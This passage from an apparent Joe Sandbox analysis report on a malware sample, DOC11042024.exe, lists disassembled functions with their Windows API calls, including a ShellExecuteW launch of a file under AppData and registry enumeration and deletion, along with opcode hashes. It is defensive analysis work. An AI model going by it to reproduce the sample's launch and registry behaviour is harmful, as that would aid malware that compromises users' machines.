                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0248f7c4af27964765fc6b01880602192228a8f4c2dc082618ccfac290c0623
                                                                              • Instruction ID: 1efa4fe38cd136b7e41ba429c88201cba22942bd8061bdf16cea85fc101f1410
                                                                              • Opcode Fuzzy Hash: e0248f7c4af27964765fc6b01880602192228a8f4c2dc082618ccfac290c0623
                                                                              • Instruction Fuzzy Hash: 99817771E04228DBDF24CFA8C844BADBBB1FF44305F11816AD856BB281D7786A96CF54
                                                                              Function 00406796 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 905fcdaa06d317cecc75d2aa53694fa74a3ca27fa6aeb4a7b917f1fdba5fd8d9
                                                                              • Instruction ID: 210be3f618b2f72b65e92a513b67774d31d2d59722dab59db414347af7fb5456
                                                                              • Opcode Fuzzy Hash: 905fcdaa06d317cecc75d2aa53694fa74a3ca27fa6aeb4a7b917f1fdba5fd8d9
                                                                              • Instruction Fuzzy Hash: AA712471D00228DBDF24CFA8C8847ADBBB1FF44305F15806AD856BB281D7385A96DF58
                                                                              Function 004068B4 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b9f1c4145ec2734ed8b745e59079d15377436192dd68815ee044f9ae39fff47b
                                                                              • Instruction ID: b62693dbdd6b91c15498026fd83965cb0e3cd6a47c92dcad7d20d914c94eb84c
                                                                              • Opcode Fuzzy Hash: b9f1c4145ec2734ed8b745e59079d15377436192dd68815ee044f9ae39fff47b
                                                                              • Instruction Fuzzy Hash: 46714671E00228DBDF28CF98C844BADBBB1FF44305F15806AD856BB281D7385A56DF58
                                                                              Function 00406800 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 424f2c4f183dead9941b158fa2fff84b988b4c1f9a0ebf82131d7c21771ae00e
                                                                              • Instruction ID: ccc624a3f951c5fd038c8a3f5e05dbaad7a961e7b6384742e379747c2412857a
                                                                              • Opcode Fuzzy Hash: 424f2c4f183dead9941b158fa2fff84b988b4c1f9a0ebf82131d7c21771ae00e
                                                                              • Instruction Fuzzy Hash: F4714671E00228DBDF28CF98C844BADBBB1FF44305F15806AD856BB281D7786A56DF58
                                                                              Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
                                                                                • Part of subcall function 00405156: lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
                                                                                • Part of subcall function 00405156: SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 334405425-0
                                                                              • Opcode ID: c596a6d52042fdea86daf11780945ec75c56bfc60ab00f903582f24da06a1166
                                                                              • Instruction ID: c0392aef0c367e4389406ba5e1c0ba34eb124b174cb2d0d9db685bc421e43e5e
                                                                              • Opcode Fuzzy Hash: c596a6d52042fdea86daf11780945ec75c56bfc60ab00f903582f24da06a1166
                                                                              • Instruction Fuzzy Hash: 63218631A04215E7CF206FA5CE48A9E7EB0AB05354F60417BF611B51E0D7B94D82DB6D
                                                                              Function 00402452 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                                                                              • RegCloseKey.ADVAPI32(?,?,?,anagallis\salpetersyrlingens\Derrieres,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$CloseOpenValue
                                                                              • String ID:
                                                                              • API String ID: 167947723-0
                                                                              • Opcode ID: 9e702ff4d446dddadc23a7c2728a5302c867c9b2eaa6e96c8f60007844719a0a
                                                                              • Instruction ID: 689d7568abe30ab34eef56eb01edff6f821dedb9ec4fcb38432ceac887f90b3f
                                                                              • Opcode Fuzzy Hash: 9e702ff4d446dddadc23a7c2728a5302c867c9b2eaa6e96c8f60007844719a0a
                                                                              • Instruction Fuzzy Hash: 03F08171A04205FBE7119FA5DE88ABF766CEF40394F10453EF105A61C0D6B85D42DB6A
                                                                              Function 00401DF3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,?), ref: 00401E3D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213, xrefs: 00401E26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteShell
                                                                              • String ID: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213
                                                                              • API String ID: 587946157-2216720624
                                                                              • Opcode ID: c0f6356d7986bd134b7e869bd2e3f43523ba6c0e57f9ad07eaf54f51413396ee
                                                                              • Instruction ID: 63c7de70329b5aaa8aeaf00e2e038bed82ba08c0140b20d7d28f7f23da677dd2
                                                                              • Opcode Fuzzy Hash: c0f6356d7986bd134b7e869bd2e3f43523ba6c0e57f9ad07eaf54f51413396ee
                                                                              • Instruction Fuzzy Hash: 4EF0C275704110ABDB10ABB5DD4AB9D36A8EB04714F200537F412F70D1DAFC8881EA2C
                                                                              Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                                              • RegCloseKey.ADVAPI32(?,?,?,anagallis\salpetersyrlingens\Derrieres,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: edca74f3e39315ad1c58b10e32b3a24559599059653e028f7be876c7d0592383
                                                                              • Instruction ID: 5a1b07c0287ba2770140473d9c06bd5dc30774897d186d6289fdd1d3069b469f
                                                                              • Opcode Fuzzy Hash: edca74f3e39315ad1c58b10e32b3a24559599059653e028f7be876c7d0592383
                                                                              • Instruction Fuzzy Hash: CA11A371A14205EADB14DFA0D6585AE77B4EF04354F20843FE042A72D0D2B85A81DB1A
                                                                              Function 00405A12 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00405EA2: lstrcpynW.KERNEL32(?,?,00000400,0040338A,004281E0,NSIS Error), ref: 00405EAF
                                                                                • Part of subcall function 004059B5: CharNextW.USER32(?,?,00424ED8,?,00405A29,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004059C3
                                                                                • Part of subcall function 004059B5: CharNextW.USER32(00000000), ref: 004059C8
                                                                                • Part of subcall function 004059B5: CharNextW.USER32(00000000), ref: 004059E0
                                                                              • lstrlenW.KERNEL32(00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 00405A6B
                                                                              • GetFileAttributesW.KERNELBASE(00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405A7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                              • String ID:
                                                                              • API String ID: 3248276644-0
                                                                              • Opcode ID: 7a63bab276b749acbbdc5dd058412836f1deaed5f83e37ad2e9a2816cfa1a2eb
                                                                              • Instruction ID: 44b809e54c7e432eba32a0cbf385da90b3e190139004c3614862346f756ec619
                                                                              • Opcode Fuzzy Hash: 7a63bab276b749acbbdc5dd058412836f1deaed5f83e37ad2e9a2816cfa1a2eb
                                                                              • Instruction Fuzzy Hash: D1F0F935305E5159D621333A5D86AAF1554CF86364B5A073BF862B12C1CB3C8D528DBD
                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                              • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                              • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                              • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                              Function 004022D3 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteOpenValue
                                                                              • String ID:
                                                                              • API String ID: 849931509-0
                                                                              • Opcode ID: 4d7ba47bebe32ca1b370ab2af70e5125a05c91946c8850d2cbfcff0b65ccaf40
                                                                              • Instruction ID: 6ade20f596bc286d2584c3cfef10a7c145a3b458b75cbe70d33d3f280513cc25
                                                                              • Opcode Fuzzy Hash: 4d7ba47bebe32ca1b370ab2af70e5125a05c91946c8850d2cbfcff0b65ccaf40
                                                                              • Instruction Fuzzy Hash: 5BF0AF72A00111EBD711BBA09A4EAAE7268DB00354F14443BF202B71C0D9FC6D428B69
                                                                              Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: 53ab543b298178f50251b2459bb562450a1dd7924065fa5eff0ceb5091c56aa8
                                                                              • Instruction ID: 80e76f6a688c62747686e25d0ca61306c2f631b5b0eee649f6067f2527668ce1
                                                                              • Opcode Fuzzy Hash: 53ab543b298178f50251b2459bb562450a1dd7924065fa5eff0ceb5091c56aa8
                                                                              • Instruction Fuzzy Hash: 43E08672B04115DBCB24DBA8ED908BD77A5EB44310754447FE902B32D0C6759C12CF38
                                                                              Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                              Memory Dump Source
